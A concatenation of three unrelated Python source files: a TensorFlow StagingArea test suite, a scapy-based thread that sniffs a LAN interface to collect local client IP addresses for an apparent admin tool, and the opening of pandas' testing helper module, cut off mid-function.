stage = stager.put([x, v])
z, y = stager.get()
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testDictionary(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea(
[dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put({'x': x, 'v': v})
ret = stager.get()
z = ret['x']
y = ret['v']
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testColocation(self):
gpu_dev = test.gpu_device_name()
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(gpu_dev):
stager = data_flow_ops.StagingArea([dtypes.float32])
y = stager.put([v])
expected_name = gpu_dev if 'gpu' not in gpu_dev else '/device:GPU:0'
self.assertEqual(y.device, expected_name)
with ops.device('/cpu:0'):
x = stager.get()
self.assertEqual(x.device, '/device:CPU:0')
G.finalize()
def testPeek(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
p = array_ops.placeholder(dtypes.int32, name='p')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.int32, ], shapes=[[]])
stage = stager.put([x])
peek = stager.peek(p)
ret = stager.get()
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
for i in range(10):
sess.run(stage, feed_dict={x:i})
for i in range(10):
self.assertTrue(sess.run(peek, feed_dict={p:i}) == i)
def testSizeAndClear(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32, name='x')
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea(
[dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put({'x': x, 'v': v})
ret = stager.get()
size = stager.size()
clear = stager.clear()
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
self.assertEqual(sess.run(size), 1)
sess.run(stage, feed_dict={x: -1})
self.assertEqual(sess.run(size), 2)
sess.run(clear)
self.assertEqual(sess.run(size), 0)
def testCapacity(self):
capacity = 3
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.int32, ],
capacity=capacity, shapes=[[]])
stage = stager.put([x])
ret = stager.get()
size = stager.size()
G.finalize()
from six.moves import queue as Queue
import threading
queue = Queue.Queue()
n = 8
with self.test_session(use_gpu=True, graph=G) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
sess.run(stage, feed_dict={x: i})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i,
sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertTrue(sess.run(size) == capacity)
# Clear the staging area completely
for i in range(n):
self.assertTrue(sess.run(ret) == i)
# It should now be empty
self.assertTrue(sess.run(size) == 0)
def testMemoryLimit(self):
memory_limit = 512*1024 # 512K
chunk = 200*1024 # 256K
capacity = memory_limit // chunk
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.uint8, name='x')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.uint8, ],
memory_limit=memory_limit, shapes=[[]])
stage = stager.put([x])
ret = stager.get()
size = stager.size()
G.finalize()
from six.moves import queue as Queue
import threading
import numpy as np
queue = Queue.Queue()
n = 8
with self.test_session(use_gpu=True, graph=G) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
sess.run(stage, feed_dict={x: np.full(chunk, i, dtype=np.uint8)})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i,
sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertTrue(sess.run(size) == capacity)
# Clear the staging area completely
for i in range(n):
self.assertTrue(np.all(sess.run(ret) == i))
self.assertTrue(sess.run(size) == 0)
if __name__ == '__main__':
test.main()
|
mod_getting_packets.py
|
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
# Встроенные модули
import time, sys, socket
from threading import Thread
# Внешние модули
try:
from scapy.all import *
except ModuleNotFoundError as err:
print(err)
sys.exit(1)
# Внутренние модули
try:
from mod_common import *
except ModuleNotFoundError as err:
print(err)
sys.exit(1)
# Класс для работы с сетевыми пакетами
class getting_packets(Thread):
# Стартовые параметры
def __init__(self, threads_list, todolist):
super().__init__()
self.socket = None
self.daemon = True
self.threads_list = threads_list
self.todolist = todolist
self.ip_clients = []
self.ip_local = get_ip_local()
# Обработчик ip
def work_with_ip(self, todolist):
# Запись в лог файл
log_write('Thread work_with_ip running')
while not app_work.empty():
# Очистка списка ip адресов
if self.todolist.empty():
self.ip_clients.clear()
# Ожидание потока
time.sleep(1)
if app_work.empty():
break
# Запись в лог файл
log_write('Thread work_with_ip stopped')
# Удаление потока из списка
self.threads_list.get()
# Обработчик каждого сетевого пакета
def work_with_packet(self, packet):
# Проверка пакета на валидность и что ip адрес источника не сам сервер
if IP in packet[0] and packet[1].src not in self.ip_local:
# Проверка, что адрес источника находится в локальной сети
if packet[1].src.find(get_config('ADUserIPMask')) != -1:
# Проверка, что ip адреса ещё нет в списке
if packet[1].src not in self.ip_clients:
# Получаем ip адрес
ip_addr = packet[1].src
# Добавляем ip адрес в список новых клиентов
self.ip_clients.append(ip_addr)
# Добавляем ip адрес в очередь
todolist.put(ip_addr)
# Главный модуль выполнения потока
def run(self):
# Запуск потока обработки ip
threading.Thread(target=self.work_with_ip, args=(todolist,)).start()
# Запуск обработчика пакетов
self.socket = conf.L2listen(type=ETH_P_ALL, filter="ip")
sniff(opened_socket=self.socket, iface=get_config('LANInterface'), prn=self.work_with_packet, store=0)
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, List, Optional, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as path:
pd.to_pickle(obj, _path)
return pd.read_pickle(_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return type(x).__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}.values")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
